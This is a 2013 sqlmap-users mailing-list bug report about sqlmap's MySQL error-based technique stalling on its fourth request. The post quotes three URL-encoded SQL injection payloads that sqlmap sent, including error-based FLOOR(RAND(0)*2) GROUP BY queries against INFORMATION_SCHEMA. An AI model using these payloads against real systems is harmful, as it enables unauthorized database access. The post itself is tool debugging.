[sqlmap-users] MySQL error based technique bug
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] MySQL error based technique bug
|
From: Konrads S. <ko...@sm...> - 2013-04-18 20:37:16
|
A php/mysql system has a simple, integer SQL injection. The only working technique is error based (verified and successfully exploited manually). Any other techniques cause the server to not reply, jus stall. When using sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3 requests, but does something different on the fourth which causes the server to time out and never reply. The successful requests are: * id=1%22%27%29%5B.%27%29%28%5D%5B * id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864 * id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 The fourth request, which I sadly don't have saved, fails. Casual glance suggested it was different from these and was not error based (I might be wrong). -- Konrads Smelkovs Applied IT sorcery. |
